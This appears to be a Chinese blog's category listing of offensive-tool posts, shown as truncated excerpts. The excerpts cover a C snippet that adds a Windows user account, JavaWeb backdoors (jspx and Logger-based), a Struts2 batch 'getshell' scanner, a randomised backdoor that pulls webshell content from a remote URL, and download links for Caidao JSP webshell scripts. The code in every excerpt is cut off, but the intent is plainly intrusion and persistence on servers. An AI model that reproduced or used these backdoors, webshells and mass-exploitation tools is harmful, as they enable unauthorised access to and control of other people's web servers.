Java login SSH
Java连接并登陆SSH(需要用到的jar包-ganymed-ssh2-build210.jar): package org.javaweb.util; import java.io.IOException; import ch.ethz.ssh2.Connection; public class Ssh { public boolean login(String host,int port,St...
阅读全文Tools(27 篇文章)
无需数据库密码-JNDI数据源方式执行Sql语句
如果只找到数据源的情况下可以直接用数据源的名连接数据库,不需要找到具体的密码。 <%@page import="java.io.File"%> <%@page import="java.io.FileWriter"%> <%@page import="java.io.BufferedWriter"%> ...
阅读全文net user
#include <windows.h> #include <lm.h> #pragma comment(lib,"netapi32") int main() { USER_INFO_1 u; DWORD dwError=0; u.usri1_name=L"tomcat"; u.usri1_password=L"admin8...
阅读全文两种“新型”的javaweb后门(jspx和Java Logger)
关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享两个我最近搞的比较有意思的JavaWeb后门给大家玩。一个常见或者比较普通的后门很容易就会被拦截或者被发现,但不知道有朋友了解下面两种后门没? 1:jspx后门 在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat...
阅读全文Struts2漏洞批量GetShell到MongoDb数据库
这个很简单的,改下main的str的关键字就可以自动getshell并倒入mongodb数据库。 [只需要添加jsoup和mongodb的jar包] import java.io.IOException; import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import ...
阅读全文JavaWeb随机后门?
我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如: 不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。 菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp <%@ page langu...
阅读全文菜刀Jsp脚本最终更新版
脚本下载地址: JSP脚本:http://xsser.me/caidao/css.jsp Jspx脚本:http://xsser.me/caidao/jspx.jspx Jspf脚本:http://xsser.me/caidao/css.jspf 详情:http://xsser.me/caidao/1.txt 修复上一版BUG: 1、修复Oracle无setCatalog的BUG。&n...
阅读全文